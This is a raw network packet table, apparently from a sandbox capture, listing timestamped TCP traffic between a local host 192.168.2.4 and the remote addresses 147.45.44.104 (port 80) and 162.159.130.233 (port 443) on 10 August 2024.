Aug 10, 2024 16:12:25.114799023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114799023 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114810944 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114816904 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114835978 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114851952 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114890099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114903927 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114917040 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114929914 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114953995 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114959002 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114968061 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114980936 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.114984035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.114996910 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.115005970 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.115031004 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126557112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126616001 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126640081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126646996 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126653910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126677990 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126691103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126705885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126718998 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126734018 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126738071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126738071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126738071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126738071 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126748085 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126761913 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126777887 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126801014 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126813889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126827955 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126842976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126842976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126842976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126842976 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126851082 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126864910 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126878977 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126888990 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126894951 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126919985 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126935005 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126948118 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126970053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126970053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126970053 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.126971006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126985073 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.126985073 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127000093 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127015114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127038002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127052069 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127065897 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127079010 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127079010 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127079010 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127079010 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127089024 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127103090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127115965 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127121925 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127130985 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127131939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127146006 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127161026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127175093 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127186060 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127198935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127203941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127203941 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127223969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127235889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127249956 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127259016 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127273083 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127279043 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127279043 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127288103 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127320051 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127332926 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127338886 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127352953 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127367020 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127407074 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127425909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127440929 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127449036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127449036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127449036 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127455950 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127470016 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127499104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127512932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127527952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127543926 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127580881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127580881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127580881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127580881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127665043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127700090 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127715111 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127737045 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127753019 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127767086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127790928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127805948 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127805948 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127805948 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127805948 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127820969 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127835035 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127849102 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127887011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127890110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127890110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127890110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127890110 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127899885 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127913952 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127928972 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127964973 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127979040 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.127990961 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127990961 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.127993107 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128006935 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128025055 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128038883 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128041983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128041983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128041983 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128042936 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128051996 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128103971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128103971 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128115892 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128462076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128469944 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128478050 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128525972 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128535986 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128550053 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128562927 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128576994 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128592968 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128604889 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128611088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128611088 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128653049 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128695011 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128709078 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128722906 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128774881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128774881 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128799915 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128813982 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128829002 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128844023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128859043 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.128906965 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128906965 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128906965 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.128963947 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129136086 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129187107 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129203081 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129216909 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129285097 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129290104 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129303932 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129317999 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129337072 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129339933 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129357100 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129370928 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129388094 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129399061 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129412889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129412889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129412889 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129441023 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129476070 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129479885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129479885 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129489899 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129511118 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129513025 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129528046 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129542112 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129565954 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129578114 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129590988 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129592896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129592896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129592896 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129614115 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129627943 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129628897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129628897 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129642963 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129650116 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129656076 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.129775047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129775047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.129775047 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.130331039 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.130428076 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.130461931 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.130475044 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.130487919 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.130502939 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.130527020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.130527020 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.130532026 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.130547047 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.130561113 CEST	80	49740	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.130624056 CEST	49740	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.144804001 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.144818068 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.144963026 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.144968987 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.145059109 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.151747942 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.151762009 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.151776075 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.151849985 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.151853085 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.151876926 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.151891947 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.151906967 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.151940107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.151957035 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.171294928 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.171314955 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.171451092 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.171457052 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.171602964 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.171618938 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.171802044 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.171807051 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.171956062 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.171968937 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.172025919 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.172032118 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.172072887 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.172072887 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.172346115 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.172360897 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.172472954 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.172472954 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.172477007 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.172523022 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.173413038 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.173427105 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.173527002 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.173531055 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.173808098 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.173821926 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.173897982 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.173902988 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.175481081 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.175493002 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.175580025 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.175585032 CEST	443	49754	162.159.130.233	192.168.2.4
Aug 10, 2024 16:12:25.176964998 CEST	49754	443	192.168.2.4	162.159.130.233
Aug 10, 2024 16:12:25.190680027 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190695047 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190710068 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190778971 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.190803051 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190824986 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190838099 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190850973 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190864086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190876961 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190881014 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.190891981 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190895081 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.190905094 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190918922 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190920115 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.190932035 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190943003 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.190948963 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190968990 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.190972090 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190985918 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.190993071 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.190999985 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191015005 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191019058 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191030025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191042900 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191045046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191059113 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191067934 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191095114 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191329002 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191344023 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191365004 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191394091 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191416025 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191418886 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191430092 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191431046 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191446066 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191461086 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191461086 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191474915 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191476107 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191488981 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191500902 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191514969 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191560984 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191585064 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191606998 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191622019 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191637039 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191646099 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191652060 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191665888 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191672087 CEST	49739	80	192.168.2.4	147.45.44.104
Aug 10, 2024 16:12:25.191683054 CEST	80	49739	147.45.44.104	192.168.2.4
Aug 10, 2024 16:12:25.191690922 CEST	49739	80	192.168.2.4	147.45.44.104
